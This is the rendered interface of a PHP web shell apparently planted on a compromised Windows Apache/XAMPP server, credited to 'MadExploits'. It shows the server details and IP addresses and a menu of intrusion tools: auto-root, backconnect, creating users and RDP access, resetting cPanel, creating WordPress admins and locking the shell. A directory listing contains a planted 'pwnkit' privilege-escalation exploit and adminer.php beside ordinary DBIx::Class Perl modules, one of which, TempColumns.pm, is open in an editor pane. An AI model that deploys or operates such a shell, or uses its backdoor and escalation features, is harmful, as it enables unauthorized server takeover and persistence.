Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
vendor /
lib /
DBIx /
Class /
CDBICompat /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
AbstractSearch.pm
1.09
KB
-rw-rw-rw-
AccessorMapping.pm
2.01
KB
-rw-rw-rw-
AttributeAPI.pm
668
B
-rw-rw-rw-
AutoUpdate.pm
900
B
-rw-rw-rw-
ColumnCase.pm
1.98
KB
-rw-rw-rw-
ColumnGroups.pm
4.43
KB
-rw-rw-rw-
ColumnsAsHash.pm
2.57
KB
-rw-rw-rw-
Constraints.pm
1.77
KB
-rw-rw-rw-
Constructor.pm
673
B
-rw-rw-rw-
Copy.pm
1.06
KB
-rw-rw-rw-
DestroyWarning.pm
451
B
-rw-rw-rw-
GetSet.pm
639
B
-rw-rw-rw-
ImaDBI.pm
3.85
KB
-rw-rw-rw-
Iterator.pm
1.59
KB
-rw-rw-rw-
LazyLoading.pm
2.84
KB
-rw-rw-rw-
LiveObjectIndex.pm
2.48
KB
-rw-rw-rw-
NoObjectIndex.pm
1.03
KB
-rw-rw-rw-
Pager.pm
499
B
-rw-rw-rw-
ReadOnly.pm
288
B
-rw-rw-rw-
Relationship.pm
1.08
KB
-rw-rw-rw-
Relationships.pm
5.45
KB
-rw-rw-rw-
Retrieve.pm
1.94
KB
-rw-rw-rw-
SQLTransformer.pm
3.16
KB
-rw-rw-rw-
Stringify.pm
451
B
-rw-rw-rw-
TempColumns.pm
2.2
KB
-rw-rw-rw-
Triggers.pm
971
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TempColumns.pm
package # hide from PAUSE DBIx::Class::CDBICompat::TempColumns; use strict; use warnings; use base qw/Class::Data::Inheritable/; use Carp; __PACKAGE__->mk_classdata('_temp_columns' => { }); sub _add_column_group { my ($class, $group, @cols) = @_; return $class->next::method($group, @cols) unless $group eq 'TEMP'; my %new_cols = map { $_ => 1 } @cols; my %tmp_cols = %{$class->_temp_columns}; for my $existing_col ( grep $new_cols{$_}, $class->columns ) { # Already been declared TEMP next if $tmp_cols{$existing_col}; carp "Declaring column $existing_col as TEMP but it already exists"; } $class->_register_column_group($group => @cols); $class->mk_group_accessors('temp' => @cols); $class->_temp_columns({ %tmp_cols, %new_cols }); } sub new { my ($class, $attrs, @rest) = @_; my $temp = $class->_extract_temp_data($attrs); my $new = $class->next::method($attrs, @rest); $new->set_temp($_, $temp->{$_}) for keys %$temp; return $new; } sub _extract_temp_data { my($self, $data) = @_; my %temp; foreach my $key (keys %$data) { $temp{$key} = delete $data->{$key} if $self->_temp_columns->{$key}; } return \%temp; } sub find_column { my ($class, $col, @rest) = @_; return $col if $class->_temp_columns->{$col}; return $class->next::method($col, @rest); } sub set { my($self, %data) = @_; my $temp_data = $self->_extract_temp_data(\%data); $self->set_temp($_, $temp_data->{$_}) for keys %$temp_data; return $self->next::method(%data); } sub get_temp { my ($self, $column) = @_; $self->throw_exception( "Can't fetch data as class method" ) unless ref $self; $self->throw_exception( "No such TEMP column '${column}'" ) unless $self->_temp_columns->{$column} ; return $self->{_temp_column_data}{$column} if exists $self->{_temp_column_data}{$column}; return undef; } sub set_temp { my ($self, $column, $value) = @_; $self->throw_exception( "No such TEMP column '${column}'" ) unless $self->_temp_columns->{$column}; $self->throw_exception( "set_temp called for ${column} without value" ) if @_ < 3; return $self->{_temp_column_data}{$column} = $value; } sub has_real_column { return 1 if shift->has_column(shift); } 1;
Close